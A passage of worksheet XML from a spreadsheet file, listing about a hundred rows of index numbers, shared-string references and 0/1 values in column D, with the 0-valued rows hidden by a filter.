        <v>1219.0</v>
      </c>
      <c r="B1221" s="1" t="s">
        <v>2146</v>
      </c>
      <c r="C1221" s="1" t="s">
        <v>2147</v>
      </c>
      <c r="D1221" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1222" hidden="1">
      <c r="A1222" s="1">
        <v>1220.0</v>
      </c>
      <c r="B1222" s="1" t="s">
        <v>2148</v>
      </c>
      <c r="C1222" s="1" t="s">
        <v>2149</v>
      </c>
      <c r="D1222" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1223" hidden="1">
      <c r="A1223" s="1">
        <v>1221.0</v>
      </c>
      <c r="B1223" s="1" t="s">
        <v>2150</v>
      </c>
      <c r="C1223" s="1" t="s">
        <v>2151</v>
      </c>
      <c r="D1223" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="1">
        <v>1222.0</v>
      </c>
      <c r="B1224" s="1" t="s">
        <v>2152</v>
      </c>
      <c r="C1224" s="1" t="s">
        <v>2153</v>
      </c>
      <c r="D1224" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1225" hidden="1">
      <c r="A1225" s="1">
        <v>1223.0</v>
      </c>
      <c r="B1225" s="1" t="s">
        <v>2154</v>
      </c>
      <c r="C1225" s="1" t="s">
        <v>2155</v>
      </c>
      <c r="D1225" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1226" hidden="1">
      <c r="A1226" s="1">
        <v>1224.0</v>
      </c>
      <c r="B1226" s="1" t="s">
        <v>2156</v>
      </c>
      <c r="C1226" s="1" t="s">
        <v>2157</v>
      </c>
      <c r="D1226" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1227" hidden="1">
      <c r="A1227" s="1">
        <v>1225.0</v>
      </c>
      <c r="B1227" s="1" t="s">
        <v>2158</v>
      </c>
      <c r="C1227" s="1" t="s">
        <v>2159</v>
      </c>
      <c r="D1227" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1228" hidden="1">
      <c r="A1228" s="1">
        <v>1226.0</v>
      </c>
      <c r="B1228" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="C1228" s="1" t="s">
        <v>2161</v>
      </c>
      <c r="D1228" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="1">
        <v>1227.0</v>
      </c>
      <c r="B1229" s="1" t="s">
        <v>2162</v>
      </c>
      <c r="C1229" s="1" t="s">
        <v>2163</v>
      </c>
      <c r="D1229" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1230" hidden="1">
      <c r="A1230" s="1">
        <v>1228.0</v>
      </c>
      <c r="B1230" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="C1230" s="1" t="s">
        <v>2165</v>
      </c>
      <c r="D1230" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1231" hidden="1">
      <c r="A1231" s="1">
        <v>1229.0</v>
      </c>
      <c r="B1231" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="C1231" s="1" t="s">
        <v>2167</v>
      </c>
      <c r="D1231" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="1">
        <v>1230.0</v>
      </c>
      <c r="B1232" s="1" t="s">
        <v>2168</v>
      </c>
      <c r="C1232" s="1" t="s">
        <v>2169</v>
      </c>
      <c r="D1232" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1233" hidden="1">
      <c r="A1233" s="1">
        <v>1231.0</v>
      </c>
      <c r="B1233" s="1" t="s">
        <v>2170</v>
      </c>
      <c r="C1233" s="1" t="s">
        <v>2171</v>
      </c>
      <c r="D1233" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1234" hidden="1">
      <c r="A1234" s="1">
        <v>1232.0</v>
      </c>
      <c r="B1234" s="1" t="s">
        <v>1987</v>
      </c>
      <c r="C1234" s="1" t="s">
        <v>2172</v>
      </c>
      <c r="D1234" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1235" hidden="1">
      <c r="A1235" s="1">
        <v>1233.0</v>
      </c>
      <c r="B1235" s="1" t="s">
        <v>2173</v>
      </c>
      <c r="C1235" s="1" t="s">
        <v>2174</v>
      </c>
      <c r="D1235" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1236" hidden="1">
      <c r="A1236" s="1">
        <v>1234.0</v>
      </c>
      <c r="B1236" s="1" t="s">
        <v>2175</v>
      </c>
      <c r="C1236" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="D1236" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1237" hidden="1">
      <c r="A1237" s="1">
        <v>1235.0</v>
      </c>
      <c r="B1237" s="1" t="s">
        <v>1929</v>
      </c>
      <c r="C1237" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D1237" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1238" hidden="1">
      <c r="A1238" s="1">
        <v>1236.0</v>
      </c>
      <c r="B1238" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C1238" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="D1238" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="1">
        <v>1237.0</v>
      </c>
      <c r="B1239" s="1" t="s">
        <v>2179</v>
      </c>
      <c r="C1239" s="1" t="s">
        <v>2180</v>
      </c>
      <c r="D1239" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1240" hidden="1">
      <c r="A1240" s="1">
        <v>1238.0</v>
      </c>
      <c r="B1240" s="1" t="s">
        <v>2181</v>
      </c>
      <c r="C1240" s="1" t="s">
        <v>2182</v>
      </c>
      <c r="D1240" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1241" hidden="1">
      <c r="A1241" s="1">
        <v>1239.0</v>
      </c>
      <c r="B1241" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="C1241" s="1" t="s">
        <v>2184</v>
      </c>
      <c r="D1241" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="1">
        <v>1240.0</v>
      </c>
      <c r="B1242" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="C1242" s="1" t="s">
        <v>2186</v>
      </c>
      <c r="D1242" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1243" hidden="1">
      <c r="A1243" s="1">
        <v>1241.0</v>
      </c>
      <c r="B1243" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C1243" s="1" t="s">
        <v>2187</v>
      </c>
      <c r="D1243" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1244" hidden="1">
      <c r="A1244" s="1">
        <v>1242.0</v>
      </c>
      <c r="B1244" s="1" t="s">
        <v>2188</v>
      </c>
      <c r="C1244" s="1" t="s">
        <v>2189</v>
      </c>
      <c r="D1244" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1245" hidden="1">
      <c r="A1245" s="1">
        <v>1243.0</v>
      </c>
      <c r="B1245" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C1245" s="1" t="s">
        <v>2190</v>
      </c>
      <c r="D1245" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="1">
        <v>1244.0</v>
      </c>
      <c r="B1246" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="C1246" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="D1246" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1247" hidden="1">
      <c r="A1247" s="1">
        <v>1245.0</v>
      </c>
      <c r="B1247" s="1" t="s">
        <v>2193</v>
      </c>
      <c r="C1247" s="1" t="s">
        <v>2194</v>
      </c>
      <c r="D1247" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="1">
        <v>1246.0</v>
      </c>
      <c r="B1248" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="C1248" s="1" t="s">
        <v>2196</v>
      </c>
      <c r="D1248" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="1">
        <v>1247.0</v>
      </c>
      <c r="B1249" s="1" t="s">
        <v>2197</v>
      </c>
      <c r="C1249" s="1" t="s">
        <v>2198</v>
      </c>
      <c r="D1249" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1250" hidden="1">
      <c r="A1250" s="1">
        <v>1248.0</v>
      </c>
      <c r="B1250" s="1" t="s">
        <v>317</v>
      </c>
      <c r="C1250" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="D1250" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="1">
        <v>1249.0</v>
      </c>
      <c r="B1251" s="1" t="s">
        <v>2200</v>
      </c>
      <c r="C1251" s="1" t="s">
        <v>2201</v>
      </c>
      <c r="D1251" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1252" hidden="1">
      <c r="A1252" s="1">
        <v>1250.0</v>
      </c>
      <c r="B1252" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="C1252" s="1" t="s">
        <v>2203</v>
      </c>
      <c r="D1252" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1253" hidden="1">
      <c r="A1253" s="1">
        <v>1251.0</v>
      </c>
      <c r="B1253" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C1253" s="1" t="s">
        <v>2204</v>
      </c>
      <c r="D1253" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1254" hidden="1">
      <c r="A1254" s="1">
        <v>1252.0</v>
      </c>
      <c r="B1254" s="1" t="s">
        <v>2205</v>
      </c>
      <c r="C1254" s="1" t="s">
        <v>2206</v>
      </c>
      <c r="D1254" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1255" hidden="1">
      <c r="A1255" s="1">
        <v>1253.0</v>
      </c>
      <c r="B1255" s="1" t="s">
        <v>2207</v>
      </c>
      <c r="C1255" s="1" t="s">
        <v>2208</v>
      </c>
      <c r="D1255" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1256" hidden="1">
      <c r="A1256" s="1">
        <v>1254.0</v>
      </c>
      <c r="B1256" s="1" t="s">
        <v>2209</v>
      </c>
      <c r="C1256" s="1" t="s">
        <v>2210</v>
      </c>
      <c r="D1256" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="1">
        <v>1255.0</v>
      </c>
      <c r="B1257" s="1" t="s">
        <v>2211</v>
      </c>
      <c r="C1257" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="D1257" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1258" hidden="1">
      <c r="A1258" s="1">
        <v>1256.0</v>
      </c>
      <c r="B1258" s="1" t="s">
        <v>2213</v>
      </c>
      <c r="C1258" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="D1258" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1259" hidden="1">
      <c r="A1259" s="1">
        <v>1257.0</v>
      </c>
      <c r="B1259" s="1" t="s">
        <v>2215</v>
      </c>
      <c r="C1259" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="D1259" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1260" hidden="1">
      <c r="A1260" s="1">
        <v>1258.0</v>
      </c>
      <c r="B1260" s="1" t="s">
        <v>1155</v>
      </c>
      <c r="C1260" s="1" t="s">
        <v>1156</v>
      </c>
      <c r="D1260" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1261" hidden="1">
      <c r="A1261" s="1">
        <v>1259.0</v>
      </c>
      <c r="B1261" s="1" t="s">
        <v>2217</v>
      </c>
      <c r="C1261" s="1" t="s">
        <v>2218</v>
      </c>
      <c r="D1261" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1262" hidden="1">
      <c r="A1262" s="1">
        <v>1260.0</v>
      </c>
      <c r="B1262" s="1" t="s">
        <v>803</v>
      </c>
      <c r="D1262" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1263" hidden="1">
      <c r="A1263" s="1">
        <v>1261.0</v>
      </c>
      <c r="B1263" s="1" t="s">
        <v>2219</v>
      </c>
      <c r="C1263" s="1" t="s">
        <v>2220</v>
      </c>
      <c r="D1263" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1264" hidden="1">
      <c r="A1264" s="1">
        <v>1262.0</v>
      </c>
      <c r="B1264" s="1" t="s">
        <v>2221</v>
      </c>
      <c r="C1264" s="1" t="s">
        <v>2222</v>
      </c>
      <c r="D1264" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="1">
        <v>1263.0</v>
      </c>
      <c r="B1265" s="1" t="s">
        <v>2223</v>
      </c>
      <c r="C1265" s="1" t="s">
        <v>2224</v>
      </c>
      <c r="D1265" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1266" hidden="1">
      <c r="A1266" s="1">
        <v>1264.0</v>
      </c>
      <c r="B1266" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C1266" s="1" t="s">
        <v>238</v>
      </c>
      <c r="D1266" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1267" hidden="1">
      <c r="A1267" s="1">
        <v>1265.0</v>
      </c>
      <c r="B1267" s="1" t="s">
        <v>2225</v>
      </c>
      <c r="C1267" s="1" t="s">
        <v>2226</v>
      </c>
      <c r="D1267" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1268" hidden="1">
      <c r="A1268" s="1">
        <v>1266.0</v>
      </c>
      <c r="B1268" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C1268" s="1" t="s">
        <v>2227</v>
      </c>
      <c r="D1268" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="1">
        <v>1267.0</v>
      </c>
      <c r="B1269" s="1" t="s">
        <v>2228</v>
      </c>
      <c r="C1269" s="1" t="s">
        <v>2229</v>
      </c>
      <c r="D1269" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="1">
        <v>1268.0</v>
      </c>
      <c r="B1270" s="1" t="s">
        <v>2230</v>
      </c>
      <c r="C1270" s="1" t="s">
        <v>2231</v>
      </c>
      <c r="D1270" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1271" hidden="1">
      <c r="A1271" s="1">
        <v>1269.0</v>
      </c>
      <c r="B1271" s="1" t="s">
        <v>2232</v>
      </c>
      <c r="C1271" s="1" t="s">
        <v>2233</v>
      </c>
      <c r="D1271" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1272" hidden="1">
      <c r="A1272" s="1">
        <v>1270.0</v>
      </c>
      <c r="B1272" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C1272" s="1" t="s">
        <v>2234</v>
      </c>
      <c r="D1272" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1273" hidden="1">
      <c r="A1273" s="1">
        <v>1271.0</v>
      </c>
      <c r="B1273" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C1273" s="1" t="s">
        <v>2235</v>
      </c>
      <c r="D1273" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1274" hidden="1">
      <c r="A1274" s="1">
        <v>1272.0</v>
      </c>
      <c r="B1274" s="1" t="s">
        <v>2236</v>
      </c>
      <c r="C1274" s="1" t="s">
        <v>2237</v>
      </c>
      <c r="D1274" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1275" hidden="1">
      <c r="A1275" s="1">
        <v>1273.0</v>
      </c>
      <c r="B1275" s="1" t="s">
        <v>2238</v>
      </c>
      <c r="C1275" s="1" t="s">
        <v>2239</v>
      </c>
      <c r="D1275" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1276" hidden="1">
      <c r="A1276" s="1">
        <v>1274.0</v>
      </c>
      <c r="B1276" s="1" t="s">
        <v>2240</v>
      </c>
      <c r="C1276" s="1" t="s">
        <v>2241</v>
      </c>
      <c r="D1276" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1277" hidden="1">
      <c r="A1277" s="1">
        <v>1275.0</v>
      </c>
      <c r="B1277" s="1" t="s">
        <v>2242</v>
      </c>
      <c r="C1277" s="1" t="s">
        <v>2243</v>
      </c>
      <c r="D1277" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1278" hidden="1">
      <c r="A1278" s="1">
        <v>1276.0</v>
      </c>
      <c r="B1278" s="1" t="s">
        <v>939</v>
      </c>
      <c r="C1278" s="1" t="s">
        <v>940</v>
      </c>
      <c r="D1278" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1279" hidden="1">
      <c r="A1279" s="1">
        <v>1277.0</v>
      </c>
      <c r="B1279" s="1" t="s">
        <v>2244</v>
      </c>
      <c r="C1279" s="1" t="s">
        <v>2245</v>
      </c>
      <c r="D1279" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1280" hidden="1">
      <c r="A1280" s="1">
        <v>1278.0</v>
      </c>
      <c r="B1280" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C1280" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="D1280" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="1">
        <v>1279.0</v>
      </c>
      <c r="B1281" s="1" t="s">
        <v>2247</v>
      </c>
      <c r="C1281" s="1" t="s">
        <v>2248</v>
      </c>
      <c r="D1281" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1282" hidden="1">
      <c r="A1282" s="1">
        <v>1280.0</v>
      </c>
      <c r="B1282" s="1" t="s">
        <v>2249</v>
      </c>
      <c r="C1282" s="1" t="s">
        <v>2250</v>
      </c>
      <c r="D1282" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1283" hidden="1">
      <c r="A1283" s="1">
        <v>1281.0</v>
      </c>
      <c r="B1283" s="1" t="s">
        <v>1365</v>
      </c>
      <c r="C1283" s="1" t="s">
        <v>2251</v>
      </c>
      <c r="D1283" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1284" hidden="1">
      <c r="A1284" s="1">
        <v>1282.0</v>
      </c>
      <c r="B1284" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="C1284" s="1" t="s">
        <v>2252</v>
      </c>
      <c r="D1284" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="1">
        <v>1283.0</v>
      </c>
      <c r="B1285" s="1" t="s">
        <v>2253</v>
      </c>
      <c r="C1285" s="1" t="s">
        <v>2254</v>
      </c>
      <c r="D1285" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1286" hidden="1">
      <c r="A1286" s="1">
        <v>1284.0</v>
      </c>
      <c r="B1286" s="1" t="s">
        <v>2255</v>
      </c>
      <c r="C1286" s="1" t="s">
        <v>2256</v>
      </c>
      <c r="D1286" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1287" hidden="1">
      <c r="A1287" s="1">
        <v>1285.0</v>
      </c>
      <c r="B1287" s="1" t="s">
        <v>2257</v>
      </c>
      <c r="C1287" s="1" t="s">
        <v>2258</v>
      </c>
      <c r="D1287" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1288" hidden="1">
      <c r="A1288" s="1">
        <v>1286.0</v>
      </c>
      <c r="B1288" s="1" t="s">
        <v>2259</v>
      </c>
      <c r="C1288" s="1" t="s">
        <v>2260</v>
      </c>
      <c r="D1288" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1289" hidden="1">
      <c r="A1289" s="1">
        <v>1287.0</v>
      </c>
      <c r="B1289" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="C1289" s="1" t="s">
        <v>1184</v>
      </c>
      <c r="D1289" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1290" hidden="1">
      <c r="A1290" s="1">
        <v>1288.0</v>
      </c>
      <c r="B1290" s="1" t="s">
        <v>2261</v>
      </c>
      <c r="C1290" s="1" t="s">
        <v>2262</v>
      </c>
      <c r="D1290" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1291" hidden="1">
      <c r="A1291" s="1">
        <v>1289.0</v>
      </c>
      <c r="B1291" s="1" t="s">
        <v>2263</v>
      </c>
      <c r="C1291" s="1" t="s">
        <v>2264</v>
      </c>
      <c r="D1291" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1292" hidden="1">
      <c r="A1292" s="1">
        <v>1290.0</v>
      </c>
      <c r="B1292" s="1" t="s">
        <v>2265</v>
      </c>
      <c r="C1292" s="1" t="s">
        <v>2266</v>
      </c>
      <c r="D1292" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1293" hidden="1">
      <c r="A1293" s="1">
        <v>1291.0</v>
      </c>
      <c r="B1293" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="C1293" s="1" t="s">
        <v>2268</v>
      </c>
      <c r="D1293" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1294" hidden="1">
      <c r="A1294" s="1">
        <v>1292.0</v>
      </c>
      <c r="B1294" s="1" t="s">
        <v>2269</v>
      </c>
      <c r="C1294" s="1" t="s">
        <v>2270</v>
      </c>
      <c r="D1294" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="1">
        <v>1293.0</v>
      </c>
      <c r="B1295" s="1" t="s">
        <v>2271</v>
      </c>
      <c r="C1295" s="1" t="s">
        <v>2272</v>
      </c>
      <c r="D1295" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="1">
        <v>1294.0</v>
      </c>
      <c r="B1296" s="1" t="s">
        <v>2273</v>
      </c>
      <c r="C1296" s="1" t="s">
        <v>2274</v>
      </c>
      <c r="D1296" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="1">
        <v>1295.0</v>
      </c>
      <c r="B1297" s="1" t="s">
        <v>2275</v>
      </c>
      <c r="C1297" s="1" t="s">
        <v>2276</v>
      </c>
      <c r="D1297" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1298" hidden="1">
      <c r="A1298" s="1">
        <v>1296.0</v>
      </c>
      <c r="B1298" s="1" t="s">
        <v>2277</v>
      </c>
      <c r="C1298" s="1" t="s">
        <v>2278</v>
      </c>
      <c r="D1298" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1299" hidden="1">
      <c r="A1299" s="1">
        <v>1297.0</v>
      </c>
      <c r="B1299" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C1299" s="1" t="s">
        <v>2279</v>
      </c>
      <c r="D1299" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="1">
        <v>1298.0</v>
      </c>
      <c r="B1300" s="1" t="s">
        <v>2280</v>
      </c>
      <c r="C1300" s="1" t="s">
        <v>2281</v>
      </c>
      <c r="D1300" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1301" hidden="1">
      <c r="A1301" s="1">
        <v>1299.0</v>
      </c>
      <c r="B1301" s="1" t="s">
        <v>383</v>
      </c>
      <c r="C1301" s="1" t="s">
        <v>2282</v>
      </c>
      <c r="D1301" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1302" hidden="1">
      <c r="A1302" s="1">
        <v>1300.0</v>
      </c>
      <c r="B1302" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C1302" s="1" t="s">
        <v>2283</v>
      </c>
      <c r="D1302" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1303" hidden="1">
      <c r="A1303" s="1">
        <v>1301.0</v>
      </c>
      <c r="B1303" s="1" t="s">
        <v>2284</v>
      </c>
      <c r="C1303" s="1" t="s">
        <v>2285</v>
      </c>
      <c r="D1303" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1304" hidden="1">
      <c r="A1304" s="1">
        <v>1302.0</v>
      </c>
      <c r="B1304" s="1" t="s">
        <v>2286</v>
      </c>
      <c r="C1304" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="D1304" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1305" hidden="1">
      <c r="A1305" s="1">
        <v>1303.0</v>
      </c>
      <c r="B1305" s="1" t="s">
        <v>2288</v>
      </c>
      <c r="C1305" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="D1305" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="1">
        <v>1304.0</v>
      </c>
      <c r="B1306" s="1" t="s">
        <v>2290</v>
      </c>
      <c r="C1306" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="D1306" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="1">
        <v>1305.0</v>
      </c>
      <c r="B1307" s="1" t="s">
        <v>2292</v>
      </c>
      <c r="C1307" s="1" t="s">
        <v>2293</v>
      </c>
      <c r="D1307" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1308" hidden="1">
      <c r="A1308" s="1">
        <v>1306.0</v>
      </c>
      <c r="B1308" s="1" t="s">
        <v>2294</v>
      </c>
      <c r="C1308" s="1" t="s">
        <v>2295</v>
      </c>
      <c r="D1308" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1309" hidden="1">
      <c r="A1309" s="1">
        <v>1307.0</v>
      </c>
      <c r="B1309" s="1" t="s">
        <v>2296</v>
      </c>
      <c r="C1309" s="1" t="s">
        <v>2297</v>
      </c>
      <c r="D1309" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="1">
        <v>1308.0</v>
      </c>
      <c r="B1310" s="1" t="s">
        <v>2298</v>
      </c>
      <c r="C1310" s="1" t="s">
        <v>2299</v>
      </c>
      <c r="D1310" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="1">
        <v>1309.0</v>
      </c>
      <c r="B1311" s="1" t="s">
        <v>2300</v>
      </c>
      <c r="C1311" s="1" t="s">
        <v>2301</v>
      </c>
      <c r="D1311" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1312" hidden="1">
      <c r="A1312" s="1">
        <v>1310.0</v>
      </c>
      <c r="B1312" s="1" t="s">
        <v>2302</v>
      </c>
      <c r="C1312" s="1" t="s">
        <v>2303</v>
      </c>
      <c r="D1312" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1313" hidden="1">
      <c r="A1313" s="1">
        <v>1311.0</v>
      </c>
      <c r="B1313" s="1" t="s">
        <v>2304</v>
      </c>
      <c r="C1313" s="1" t="s">
        <v>2305</v>
      </c>
      <c r="D1313" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1314" hidden="1">
      <c r="A1314" s="1">
        <v>1312.0</v>
      </c>
      <c r="B1314" s="1" t="s">
        <v>2306</v>
      </c>
      <c r="C1314" s="1" t="s">
        <v>2307</v>
      </c>
      <c r="D1314" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1315" hidden="1">
      <c r="A1315" s="1">
        <v>1313.0</v>
      </c>
      <c r="B1315" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="C1315" s="1" t="s">
        <v>2308</v>
      </c>
      <c r="D1315" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="1">
        <v>1314.0</v>
      </c>
      <c r="B1316" s="1" t="s">
        <v>2309</v>
      </c>
      <c r="C1316" s="1" t="s">
        <v>2310</v>
      </c>
      <c r="D1316" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1317" hidden="1">
      <c r="A1317" s="1">
        <v>1315.0</v>
      </c>
      <c r="B1317" s="1" t="s">
        <v>2311</v>
      </c>
      <c r="C1317" s="1" t="s">
        <v>2312</v>
      </c>
      <c r="D1317" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1318" hidden="1">
      <c r="A1318" s="1">
        <v>1316.0</v>
      </c>
      <c r="B1318" s="1" t="s">
        <v>2313</v>
      </c>
      <c r="C1318" s="1" t="s">
        <v>2314</v>
      </c>
      <c r="D1318" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1319" hidden="1">
      <c r="A1319" s="1">
        <v>1317.0</v>
      </c>
      <c r="B1319" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C1319" s="1" t="s">
        <v>2315</v>
      </c>
      <c r="D1319" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1320" hidden="1">
      <c r="A1320" s="1">
        <v>1318.0</v>
      </c>
      <c r="B1320" s="1" t="s">
        <v>2316</v>
      </c>
      <c r="C1320" s="1" t="s">
        <v>2317</v>
      </c>
      <c r="D1320" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1321" hidden="1">
      <c r="A1321" s="1">
        <v>1319.0</v>
      </c>
      <c r="B1321" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C1321" s="1" t="s">
        <v>2318</v>
      </c>
      <c r="D1321" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1322" hidden="1">
      <c r="A1322" s="1">
        <v>1320.0</v>
      </c>
      <c r="B1322" s="1" t="s">
        <v>2319</v>
      </c>
      <c r="C1322" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="D1322" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="1">
        <v>1321.0</v>
      </c>
      <c r="B1323" s="1" t="s">
        <v>2321</v>
      </c>
      <c r="C1323" s="1" t="s">
        <v>2322</v>
      </c>
      <c r="D1323" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1324" hidden="1">
      <c r="A1324" s="1">
        <v>1322.0</v>
      </c>
      <c r="B1324" s="1" t="s">
        <v>1167</v>
      </c>
